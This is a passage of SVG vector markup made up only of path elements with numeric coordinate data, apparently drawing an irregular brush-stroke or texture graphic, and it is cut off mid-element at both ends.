.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n <path 